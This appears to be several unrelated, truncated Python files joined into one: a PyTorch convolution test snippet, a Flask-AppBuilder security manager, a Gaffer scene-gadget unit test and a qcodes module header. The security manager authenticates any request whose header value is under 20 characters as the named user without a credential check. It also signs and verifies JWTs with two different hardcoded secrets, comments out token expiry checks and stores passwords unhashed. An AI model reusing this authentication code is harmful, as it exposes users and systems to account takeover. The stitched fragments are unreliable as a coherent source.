N, L = 6, 4
x = th.randn(N, 1, L, 2)
t = th.randn(N, 3, L, 2)
pconv = PhaseConv1d(1, 3, 3, 1, 1, bias=True)
pconv = pconv.to(device)
x, t = x.to(device), t.to(device)
y = pconv(x)
loss_fn = th.nn.MSELoss()
loss = loss_fn(y, t)
loss.backward()
print(x.shape)
print(y.shape)
print(loss.item())
N, H, W = 6, 16, 8
x = th.randn(N, 1, H, W, 2)
| |
from flask_login import current_user, LoginManager
import logging
import json
import jwt
from sqlalchemy.ext.declarative import declared_attr
from flask_babel import lazy_gettext
import time
import hashlib
from typing import List
import requests
from flask import current_app,redirect, g, flash, request, session, abort, make_response
from flask_appbuilder.security.sqla import models as ab_models
from flask_appbuilder.security.sqla.manager import SecurityManager
from werkzeug.security import generate_password_hash
from flask_babel import lazy_gettext as _
from flask_appbuilder.security.views import (
PermissionModelView,
PermissionViewModelView,
RoleModelView,
UserModelView,
RoleListWidget,
RoleShowWidget,
)
from werkzeug.security import check_password_hash
from flask_appbuilder.security.sqla.models import (
assoc_permissionview_role,
assoc_user_role,
)
from flask import g
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Integer,
Sequence,
String,
Table,
UniqueConstraint,
)
from sqlalchemy.orm import backref, relationship
from flask_appbuilder.security.decorators import has_access, has_access_api, permission_name
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_appbuilder.widgets import ListWidget
from flask_appbuilder.const import LOGMSG_WAR_SEC_LOGIN_FAILED
from sqlalchemy import or_
import xml.etree.ElementTree as ET
from myapp.exceptions import MyappSecurityException
from flask_appbuilder.security.views import AuthDBView, AuthRemoteUserView
from flask_appbuilder.security.views import expose
from flask_appbuilder import base
from flask_login import login_user, logout_user,login_manager
from flask_appbuilder.security.views import AuthDBView, AuthRemoteUserView
from flask_appbuilder.security.registerviews import RegisterUserDBView
from flask_appbuilder.security.forms import RegisterUserDBForm
from flask_appbuilder.security.views import expose
import xml.etree.ElementTree as ET
from functools import update_wrapper
from flask import redirect, g, flash, request, session, abort
from celery.schedules import crontab
from flask_appbuilder.security.sqla.models import assoc_permissionview_role
from sqlalchemy import select, Table
from flask_appbuilder.const import (
AUTH_DB,
AUTH_LDAP,
AUTH_OAUTH,
AUTH_OID,
AUTH_REMOTE_USER,
LOGMSG_ERR_SEC_AUTH_LDAP,
LOGMSG_ERR_SEC_AUTH_LDAP_TLS,
LOGMSG_WAR_SEC_LOGIN_FAILED,
LOGMSG_WAR_SEC_NO_USER,
LOGMSG_WAR_SEC_NOLDAP_OBJ,
PERMISSION_PREFIX
)
from flask_appbuilder.models.sqla import Model
from flask_appbuilder.actions import action
import pysnooper
import json
# 用户列表页面模板
class MyappSecurityListWidget(ListWidget):
"""
Redeclaring to avoid circular imports
"""
template = "myapp/fab_overrides/list.html"
# 角色列表页模板
class MyappRoleListWidget(ListWidget):
"""
Role model view from FAB already uses a custom list widget override
So we override the override
"""
template = "myapp/fab_overrides/list_role.html"
def __init__(self, **kwargs):
kwargs["appbuilder"] = current_app.appbuilder
super().__init__(**kwargs)
# 自定义list,add,edit页面内容
UserModelView.list_columns= ["username", "active", "roles"]
UserModelView.edit_columns= ["first_name", "last_name", "username", "active", "email"]
UserModelView.add_columns= ["first_name", "last_name", "username", "email", "active", "roles"]
UserModelView.list_widget = MyappSecurityListWidget
RoleModelView.list_widget = MyappRoleListWidget
PermissionViewModelView.list_widget = MyappSecurityListWidget
PermissionModelView.list_widget = MyappSecurityListWidget
# 自定义扩展系统自带的user
from flask_appbuilder.security.sqla.models import User,Role
from sqlalchemy import Column, Integer, ForeignKey, String, Sequence, Table
# 修改绑定
class MyUser(User):
__tablename__ = 'ab_user'
org = Column(String(200)) # 新增的属性,组织架构
def get_full_name(self):
return self.username
# 使用用户名为名称
def __repr__(self):
return self.username
def is_admin(self):
user_roles = [role.name.lower() for role in list(self.roles)]
if "admin" in user_roles:
return True
return False
@property
def secret(self):
if self.changed_on:
pass
# help(self.changed_on)
# timestamp = int(func.date_format(self.changed_on))
timestamp = int(self.changed_on.timestamp())
payload = {
"iss": self.username # 用户名作为身份
# "iat": timestamp, # 签发期
# "nbf": timestamp, # 生效期
# "exp": timestamp + 60 * 60 * 24 * 30 * 12, # 有效期12个月
}
global_password = '<PASSWORD>'
encoded_jwt = jwt.encode(payload, global_password, algorithm='HS256')
encoded_jwt = encoded_jwt.decode('utf-8')
return encoded_jwt
return ''
# 自定义role view 视图
class MyRoleModelView(RoleModelView):
datamodel = SQLAInterface(Role)
order_columns = ["id"]
route_base = "/roles"
list_columns = ["name", "permissions"]
# 自定义用户展示
class MyUserRemoteUserModelView(UserModelView):
list_columns = ["username", "active", "roles", ]
edit_columns = ["first_name", "last_name", "username", "active", "email", "roles",'org' ]
add_columns = ["first_name", "last_name", "username", "email", "active", "roles",'org' ]
show_columns = ["username", "active", "roles", "login_count"]
list_widget = MyappSecurityListWidget
label_columns = {
"get_full_name": lazy_gettext("Full Name"),
"first_name": lazy_gettext("First Name"),
"last_name": lazy_gettext("Last Name"),
"username": lazy_gettext("User Name"),
"password": lazy_gettext("Password"),
"active": lazy_gettext("Is Active?"),
"email": lazy_gettext("Email"),
"roles": lazy_gettext("Role"),
"last_login": lazy_gettext("Last login"),
"login_count": lazy_gettext("Login count"),
"fail_login_count": lazy_gettext("Failed login count"),
"created_on": lazy_gettext("Created on"),
"created_by": lazy_gettext("Created by"),
"changed_on": lazy_gettext("Changed on"),
"changed_by": lazy_gettext("Changed by"),
"secret": lazy_gettext("Authorization"),
}
show_fieldsets = [
(
lazy_gettext("User info"),
{"fields": ["username", "active", "roles", "login_count",'secret']},
),
(
lazy_gettext("Personal Info"),
{"fields": ["first_name", "last_name", "email",'org'], "expanded": True},
),
(
lazy_gettext("Audit Info"),
{
"fields": [
"last_login",
"fail_login_count",
"created_on",
"created_by",
"changed_on",
"changed_by",
],
"expanded": False,
},
),
]
user_show_fieldsets = [
(
lazy_gettext("User info"),
{"fields": ["username", "active", "roles", "login_count",'secret']},
),
(
lazy_gettext("Personal Info"),
{"fields": ["first_name", "last_name", "email"], "expanded": True},
),
]
@expose("/userinfo/")
@has_access
def userinfo(self):
item = self.datamodel.get(g.user.id, self._base_filters)
widgets = self._get_show_widget(
g.user.id, item, show_fieldsets=self.user_show_fieldsets
)
self.update_redirect()
return self.render_template(
self.show_template,
title=self.user_info_title,
widgets=widgets,
appbuilder=self.appbuilder,
)
from myapp.project import MyCustomRemoteUserView
from myapp.project import Myauthdbview
# myapp自带的角色和角色权限,自定义了各种权限
# 基础类fab-Security-Manager中 def load_user(self, pk): 是用来认证用户的
# before_request是user赋值给g.user
# @pysnooper.snoop()
class MyappSecurityManager(SecurityManager):
user_model = MyUser # 用户使用自定义的用户
rolemodelview = MyRoleModelView #
# 远程认证
userremoteusermodelview = MyUserRemoteUserModelView
authremoteuserview = MyCustomRemoteUserView
# 账号密码认证
userdbmodelview = MyUserRemoteUserModelView
authdbview = Myauthdbview
# 构建启动前工作,认证
@staticmethod
def before_request():
g.user = current_user
# if len(request.path)>7 and request.path[:7]!='/static' and g.user and hasattr(g.user, 'username'):
# logging.info('------------%s(%s):%s'%(request.method,g.user.username,request.path))
def __init__(self, appbuilder):
super(MyappSecurityManager, self).__init__(appbuilder)
# 添加从header中进行认证的方式
self.lm.header_loader(self.load_user_from_header)
# 使用header 认证,通过rtx名获取用户
# @pysnooper.snoop(depth=1)
def load_user_from_header(self, authorization_value):
# token=None
# if 'token' in request.headers:
# token = request.headers['token']
if authorization_value:
# rtx 免认证
if len(authorization_value) < 20:
username = authorization_value
if username:
user = self.find_user(username)
g.user = user
return user
else: # token 认证
encoded_jwt = authorization_value.encode('utf-8')
payload = jwt.decode(encoded_jwt, 'myapp', algorithms=['HS256'])
# if payload['iat'] > time.time():
# return
# elif payload['exp'] < time.time():
# return
# else:
user = self.find_user(payload['iss'])
g.user = user
return user
# 自定义登录用户
def load_user(self, pk):
user = self.get_user_by_id(int(pk))
# set cookie
return user
# 注册security菜单栏下的子菜单和链接
# @pysnooper.snoop()
def register_views(self):
if not self.appbuilder.app.config.get('FAB_ADD_SECURITY_VIEWS', True):
return
# Security APIs
self.appbuilder.add_api(self.security_api)
if self.auth_user_registration:
if self.auth_type == AUTH_DB:
self.registeruser_view = self.registeruserdbview()
elif self.auth_type == AUTH_OID:
self.registeruser_view = self.registeruseroidview()
elif self.auth_type == AUTH_OAUTH:
self.registeruser_view = self.registeruseroauthview()
if self.registeruser_view:
self.appbuilder.add_view_no_menu(self.registeruser_view)
self.appbuilder.add_view_no_menu(self.resetpasswordview())
self.appbuilder.add_view_no_menu(self.resetmypasswordview())
self.appbuilder.add_view_no_menu(self.userinfoeditview())
if self.auth_type == AUTH_DB:
self.user_view = self.userdbmodelview
self.auth_view = self.authdbview()
elif self.auth_type == AUTH_LDAP:
self.user_view = self.userldapmodelview
self.auth_view = self.authldapview()
elif self.auth_type == AUTH_OAUTH:
self.user_view = self.useroauthmodelview
self.auth_view = self.authoauthview()
elif self.auth_type == AUTH_REMOTE_USER:
self.user_view = self.userremoteusermodelview
self.auth_view = self.authremoteuserview()
else:
self.user_view = self.useroidmodelview
self.auth_view = self.authoidview()
if self.auth_user_registration:
pass
self.registeruser_view = self.registeruseroidview()
self.appbuilder.add_view_no_menu(self.registeruser_view)
self.appbuilder.add_view_no_menu(self.auth_view)
self.user_view = self.appbuilder.add_view(
self.user_view,
"List Users",
icon="fa-user",
href="/users/list/?_flt_2_username=",
label=_("List Users"),
category="Security",
category_icon="fa-cogs",
category_label=_("Security"),
)
role_view = self.appbuilder.add_view(
self.rolemodelview,
"List Roles",
icon="fa-group",
href="/roles/list/?_flt_2_name=",
label=_("List Roles"),
category="Security",
category_icon="fa-cogs",
)
role_view.related_views = [self.user_view.__class__]
if self.userstatschartview:
self.appbuilder.add_view(
self.userstatschartview,
"User's Statistics",
icon="fa-bar-chart-o",
label=_("User's Statistics"),
category="Security",
)
if self.auth_user_registration:
self.appbuilder.add_view(
self.registerusermodelview,
"User's Statistics",
icon="fa-user-plus",
label=_("User Registrations"),
category="Security",
)
self.appbuilder.menu.add_separator("Security")
self.appbuilder.add_view(
self.permissionmodelview,
"Base Permissions",
icon="fa-lock",
label=_("Base Permissions"),
category="Security",
)
self.appbuilder.add_view(
self.viewmenumodelview,
"Views/Menus",
icon="fa-list-alt",
label=_("Views/Menus"),
category="Security",
)
self.appbuilder.add_view(
self.permissionviewmodelview,
"Permission on Views/Menus",
icon="fa-link",
label=_("Permission on Views/Menus"),
category="Security",
)
# @pysnooper.snoop()
def add_org_user(self,username,first_name,last_name,org,email,roles,password="",hashed_password=""):
"""
Generic function to create user
"""
try:
user = self.user_model()
user.first_name = first_name
user.org = org
user.last_name = last_name
user.username = username
user.email = email
user.active = True
user.roles+=roles # 添加默认注册角色
user.password=password
# if hashed_password:
# user.password = <PASSWORD>
# else:
# user.password = <PASSWORD>password_<PASSWORD>(password)
self.get_session.add(user)
self.get_session.commit()
try:
from myapp.models.model_team import Project_User, Project
public_project = self.get_session.query(Project).filter(Project.name == "public").filter(Project.type == "org").first()
if public_project:
project_user = Project_User()
project_user.project = public_project
project_user.role = 'dev'
project_user.user_id = user.id
self.get_session.add(project_user)
self.get_session.commit()
except Exception as e1:
self.get_session.rollback()
return user
except Exception as e:
self.get_session.rollback()
return False
# 添加public项目组
# 添加注册远程用户
# @pysnooper.snoop()
def auth_user_remote_org_user(self, username,org_name='',password=''):
if not username:
return None
# 查找用户
user = self.find_user(username=username)
# 添加以组织同名的角色,同时添加上级角色
# 注册rtx同名角色
rtx_role = self.add_role(username)
# 如果用户不存在就注册用户
if user is None:
user = self.add_org_user(
username=username,
first_name=username,
last_name=username,
password=password,
org=org_name, # 添加组织架构
email=username + "@<EMAIL>",
roles=[self.find_role(self.auth_user_registration_role),rtx_role] if self.find_role(self.auth_user_registration_role) else [rtx_role,] # org_role 添加gamma默认角色, 组织架构角色先不自动添加
)
elif not user.is_active: # 如果用户未激活不允许接入
print(LOGMSG_WAR_SEC_LOGIN_FAILED.format(username))
return None
if user:
gamma_role = self.find_role(self.auth_user_registration_role)
if gamma_role and gamma_role not in user.roles:
user.roles.append(gamma_role)
if rtx_role and rtx_role not in user.roles:
user.roles.append(rtx_role)
# 更新用户信息
if org_name:
user.org = org_name # 更新组织架构字段
org_role = self.add_role(org_name)
if org_role not in user.roles:
user.roles.append(org_role)
self.update_user_auth_stat(user)
return user
READ_ONLY_MODEL_VIEWS = {
'link','Minio','Kubernetes Dashboard','Granfana','Wiki'
}
USER_MODEL_VIEWS = {
"UserDBModelView",
"UserLDAPModelView",
"UserOAuthModelView",
"UserOIDModelView",
"UserRemoteUserModelView",
}
# 只有admin才能看到的menu
ADMIN_ONLY_VIEW_MENUS = {
"ResetPasswordView",
"RoleModelView",
"List Users",
"List Roles",
"UserStatsChartView",
"Base Permissions",
"Permission on Views/Menus",
"Action Log",
"Views/Menus",
"ViewMenuModelView",
"User's Statistics",
"Security",
} | USER_MODEL_VIEWS
ALPHA_ONLY_VIEW_MENUS = {}
# 只有admin才有的权限
ADMIN_ONLY_PERMISSIONS = {
"can_override_role_permissions",
"can_override_role_permissions",
# "can_approve", # db owner需要授权approve 权限后才能授权
"can_update_role",
}
READ_ONLY_PERMISSION = {"can_show", "can_list",'can_add'}
ALPHA_ONLY_PERMISSIONS = {
"muldelete"
}
# 用户创建menu才有的权限
OBJECT_SPEC_PERMISSIONS = {
"can_only_access_owned_queries",
}
# 所有人都可以有的基本权限
ACCESSIBLE_PERMS = {"can_userinfo","can_request_access","can_approve"}
# 获取用户是否有在指定视图上的指定权限名
# @pysnooper.snoop()
def can_access(self, permission_name, view_name):
"""Protecting from has_access failing from missing perms/view"""
user = g.user
if user.is_anonymous:
return self.is_item_public(permission_name, view_name)
return self._has_view_access(user, permission_name, view_name)
# 获取用户具有指定权限的视图
def user_view_menu_names(self, permission_name: str):
from myapp import db
base_query = (
db.session.query(self.viewmenu_model.name)
.join(self.permissionview_model)
.join(self.permission_model)
.join(assoc_permissionview_role)
.join(self.role_model)
)
# 非匿名用户
if not g.user.is_anonymous:
# filter by user id
view_menu_names = (
base_query.join(assoc_user_role)
.join(self.user_model)
.filter(self.user_model.id == g.user.id)
.filter(self.permission_model.name == permission_name)
).all()
return set([s.name for s in view_menu_names])
# Properly treat anonymous user 匿名用户
public_role = self.get_public_role()
if public_role:
# filter by public role
view_menu_names = (
base_query.filter(self.role_model.id == public_role.id).filter(
self.permission_model.name == permission_name
)
).all()
return set([s.name for s in view_menu_names])
return set()
# 在视图上添加权限
def merge_perm(self, permission_name, view_menu_name):
logging.warning(
"This method 'merge_perm' is | |
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import imath
import IECore
import IECoreScene
import IECoreGL
import Gaffer
import GafferTest
import GafferUI
import GafferUITest
import GafferScene
import GafferSceneUI
class SceneGadgetTest( GafferUITest.TestCase ) :
def testBound( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["p"]["out"] )
s["g"]["transform"]["translate"]["x"].setValue( 2 )
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["g"]["out"] )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
s["g"]["transform"]["translate"]["y"].setValue( 4 )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
s["g"]["transform"]["translate"].setValue( imath.V3f( 0 ) )
s["s"] = GafferScene.Sphere()
s["g"]["in"][1].setInput( s["s"]["out"] )
s["p"]["transform"]["translate"]["z"].setValue( 10 )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
# Nothing selected, so selected bound is empty
self.assertEqual( sg.bound( True ), imath.Box3f() )
sg.setExpandedPaths( IECore.PathMatcher( ["/group/"] ) )
sg.setSelection( IECore.PathMatcher( ["/group/plane"] ) )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
# Only plane is selected
self.assertEqual( sg.bound( True ), s["p"]["out"].bound( "/" ) )
# Omitting plane takes just sphere
self.assertEqual( sg.bound( False, IECore.PathMatcher( ["/group/plane"]) ), s["s"]["out"].bound( "/" ) )
# Omitting only selected object while using selected=True leaves empty bound
self.assertEqual( sg.bound( True, IECore.PathMatcher( ["/group/plane"]) ), imath.Box3f() )
def assertObjectAt( self, gadget, ndcPosition, path ) :
viewportGadget = gadget.ancestor( GafferUI.ViewportGadget )
rasterPosition = ndcPosition * imath.V2f( viewportGadget.getViewport() )
gadgetLine = viewportGadget.rasterToGadgetSpace( rasterPosition, gadget )
self.assertEqual( gadget.objectAt( gadgetLine ), path )
def assertObjectsAt( self, gadget, ndcBox, paths ) :
viewportGadget = gadget.ancestor( GafferUI.ViewportGadget )
rasterMin = ndcBox.min() * imath.V2f( viewportGadget.getViewport() )
rasterMax = ndcBox.max() * imath.V2f( viewportGadget.getViewport() )
gadgetMin = viewportGadget.rasterToGadgetSpace( rasterMin, gadget ).p0
gadgetMax = viewportGadget.rasterToGadgetSpace( rasterMax, gadget ).p1
objectsAt = IECore.PathMatcher()
gadget.objectsAt( gadgetMin, gadgetMax, objectsAt )
objects = set( objectsAt.paths() )
expectedObjects = set( IECore.PathMatcher( paths ).paths() )
self.assertEqual( objects, expectedObjects )
def testObjectVisibility( self ) :
s = Gaffer.ScriptNode()
s["s"] = GafferScene.Sphere()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["s"]["out"] )
s["a"] = GafferScene.StandardAttributes()
s["a"]["in"].setInput( s["g"]["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setMinimumExpansionDepth( 1 )
sg.setScene( s["a"]["out"] )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 1000 )
sg.waitForCompletion()
gw.getViewportGadget().frame( sg.bound() )
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "group", "sphere" ] ) )
s["a"]["attributes"]["visibility"]["enabled"].setValue( True )
s["a"]["attributes"]["visibility"]["value"].setValue( False )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
s["a"]["attributes"]["visibility"]["enabled"].setValue( True )
s["a"]["attributes"]["visibility"]["value"].setValue( True )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "group", "sphere" ] ) )
@unittest.skipIf( GafferTest.inCI(), "Unknown problem running in cloud" )
def testExpansion( self ) :
s = Gaffer.ScriptNode()
s["s"] = GafferScene.Sphere()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["s"]["out"] )
s["a"] = GafferScene.StandardAttributes()
s["a"]["in"].setInput( s["g"]["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["a"]["out"] )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 10000 )
sg.waitForCompletion()
gw.getViewportGadget().frame( sg.bound() )
self.waitForIdle( 10000 )
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
self.assertObjectsAt( sg, imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ), [ "/group" ] )
sg.setExpandedPaths( IECore.PathMatcher( [ "/group" ] ) )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "group", "sphere" ] ) )
self.assertObjectsAt( sg, imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ), [ "/group/sphere" ] )
sg.setExpandedPaths( IECore.PathMatcher( [] ) )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
self.assertObjectsAt( sg, imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ), [ "/group" ] )
def testExpressions( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["p"]["out"] )
s["g"]["in"][1].setInput( s["p"]["out"] )
s["g"]["in"][2].setInput( s["p"]["out"] )
s["e"] = Gaffer.Expression()
s["e"].setExpression( "parent['p']['dimensions']['x'] = 1 + context.getFrame() * 0.1" )
g = GafferSceneUI.SceneGadget()
g.setScene( s["g"]["out"] )
g.bound()
def testGLResourceDestruction( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["p"]["out"] )
s["g"]["in"][1].setInput( s["p"]["out"] )
s["g"]["in"][2].setInput( s["p"]["out"] )
s["g"]["in"][3].setInput( s["p"]["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["g"]["out"] )
sg.setMinimumExpansionDepth( 2 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
# Reduce the GL cache size so that not everything will fit, and we'll
# need to dispose of some objects. We can't dispose of objects on any
# old thread, just the main GL thread, so it's important that we test
# that we're doing that appropriately.
IECoreGL.CachedConverter.defaultCachedConverter().setMaxMemory( 100 )
for i in range( 1, 1000 ) :
s["p"]["dimensions"]["x"].setValue( i )
self.waitForIdle( 10 )
def testExceptionsDuringCompute( self ) :
# Make this scene
#
# - bigSphere
# - littleSphere (with exception in attributes expression)
s = Gaffer.ScriptNode()
s["s1"] = GafferScene.Sphere()
s["s1"]["name"].setValue( "bigSphere" )
s["s2"] = GafferScene.Sphere()
s["s2"]["name"].setValue( "littleSphere" )
s["s2"]["radius"].setValue( 0.1 )
s["p"] = GafferScene.Parent()
s["p"]["in"].setInput( s["s1"]["out"] )
s["p"]["children"][0].setInput( s["s2"]["out"] )
s["p"]["parent"].setValue( "/bigSphere" )
s["a"] = GafferScene.StandardAttributes()
s["a"]["in"].setInput( s["p"]["out"] )
s["a"]["attributes"]["doubleSided"]["enabled"].setValue( True )
s["e"] = Gaffer.Expression()
s["e"].setExpression( 'parent["a"]["attributes"]["doubleSided"]["value"] = context["nonexistent"]' )
s["f"] = GafferScene.PathFilter()
s["f"]["paths"].setValue( IECore.StringVectorData( [ "/bigSphere/littleSphere" ] ) )
s["a"]["filter"].setInput( s["f"]["out"] )
# Try to view it
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["a"]["out"] )
sg.setMinimumExpansionDepth( 4 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
gw.getViewportGadget().setPlanarMovement( False )
gw.getViewportGadget().setCamera(
IECoreScene.Camera( parameters = { "projection" : "perspective", } )
)
originalMessageHandler = IECore.MessageHandler.getDefaultHandler()
mh = IECore.CapturingMessageHandler()
IECore.MessageHandler.setDefaultHandler(
IECore.LevelFilteredMessageHandler( mh, IECore.LevelFilteredMessageHandler.defaultLevel() )
)
try :
w.setVisible( True )
self.waitForIdle( 1000 )
sg.waitForCompletion()
# Check we were told about the problem
self.assertEqual( len( mh.messages ), 1 )
self.assertEqual( mh.messages[0].level, mh.Level.Error )
self.assertTrue( "nonexistent" in mh.messages[0].message )
# And that there isn't some half-assed partial scene
# being displayed.
self.assertTrue( sg.bound().isEmpty() )
gw.getViewportGadget().frame( imath.Box3f( imath.V3f( -1 ), imath.V3f( 1 ) ) )
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
# And that redraws don't cause more fruitless attempts
# to compute the scene.
gw.getViewportGadget().frame( imath.Box3f( imath.V3f( -1.1 ), imath.V3f( 1.1 ) ) )
self.waitForIdle( 1000 )
self.assertEqual( len( mh.messages ), 1 )
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
self.assertTrue( sg.bound().isEmpty() )
# Fix the problem with the scene, and check that we can see something now
s["f"]["enabled"].setValue( False )
sg.waitForCompletion()
self.assertEqual( len( mh.messages ), 1 )
self.assertFalse( sg.bound().isEmpty() )
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "bigSphere" ] ) )
finally :
IECore.MessageHandler.setDefaultHandler( originalMessageHandler )
def testObjectsAtBox( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
sphere["radius"].setValue( 0.25 )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
subTree = GafferScene.SubTree()
subTree["in"].setInput( instancer["out"] )
subTree["root"].setValue( "/plane" )
sg = GafferSceneUI.SceneGadget()
sg.setScene( subTree["out"] )
sg.setMinimumExpansionDepth( 100 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 10000 )
gw.getViewportGadget().frame( sg.bound() )
self.waitForIdle( 10000 )
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ),
[ "/instances/sphere/{}".format( i ) for i in range( 0, 4 ) ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0 ), imath.V2f( 0.5 ) ),
[ "/instances/sphere/2" ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0.5, 0 ), imath.V2f( 1, 0.5 ) ),
[ "/instances/sphere/3" ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0, 0.5 ), imath.V2f( 0.5, 1 ) ),
[ "/instances/sphere/0" ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0.5 ), imath.V2f( 1 ) ),
[ "/instances/sphere/1" ]
)
def testObjectAtLine( self ) :
cubes = []
names = ( "left", "center", "right" )
for i in range( 3 ) :
cube = GafferScene.Cube()
cube["transform"]["translate"].setValue( imath.V3f( ( i - 1 ) * 2.0, 0.0, -2.5 ) )
cube["name"].setValue( names[i] )
cubes.append( cube )
group = GafferScene.Group()
for i, cube in enumerate( cubes ) :
group["in"][i].setInput( cube["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setScene( group["out"] )
sg.setMinimumExpansionDepth( 100 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 10000 )
vp = gw.getViewportGadget()
# This is the single most important line in this test. If you don't set
# this to false, you get an orthographic camera, even if you set a
# perspective projection.
vp.setPlanarMovement( False )
c = IECoreScene.Camera()
c.setProjection( "perspective" )
c.setFocalLength( 35 )
c.setAperture( imath.V2f( 36, 24 ) )
vp.setCamera( c )
cameraTransform = imath.M44f()
cameraTransform.translate( imath.V3f( 0, 0, 2 ) )
vp.setCameraTransform( cameraTransform )
self.waitForIdle( 10000 )
# We assume in this case, that gadget space is world space
leftCubeDir = IECore.LineSegment3f( imath.V3f( 0, 0, 2 ), imath.V3f( -2, 0, -2 ) )
pathA = sg.objectAt( leftCubeDir )
pathB, hitPoint = sg.objectAndIntersectionAt( leftCubeDir )
self.assertIsNotNone( pathA )
self.assertEqual( pathA, IECore.InternedStringVectorData( [ "group", "left" ] ) )
self.assertEqual( pathA, pathB )
self.assertAlmostEqual( hitPoint.x, -2, delta = 0.01 )
self.assertAlmostEqual( hitPoint.y, 0, delta = 0.01 )
self.assertAlmostEqual( hitPoint.z, -2, delta = 0.01 )
centerCubeDir = IECore.LineSegment3f( imath.V3f( 0, 0, 1 ), imath.V3f( 0, 0, -1 ) )
pathA = sg.objectAt( centerCubeDir )
pathB, hitPoint = sg.objectAndIntersectionAt( centerCubeDir )
self.assertIsNotNone( pathA )
self.assertEqual( pathA, IECore.InternedStringVectorData( [ "group", "center" ] | |
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 1 16:32:55 2020
IN DEVELOPMENT
atm - automated test measurements
Utility toolset that will eventually enable automated measurement of test structure devices.
Consists of a few important classes:
MeasurementControl - performs and analyses measurements according to a process
MeasurementAnalysis - used to analyse measurement datasets
MeasurementProcess - an algorithm that specifies the sequence of measurements to be performed
MeasurementMap - contains functions to work out correct gates and instruments for a given measurement
MeasurementGeometry - physical geometry of the sample, for now we will only consider linear arrays
@author: krolljg
"""
import qcodes
from qcodes import Instrument
import qtt
from qtt.measurements.scans import scanjob_t, scan1D, scan2D, scan1Dfeedback
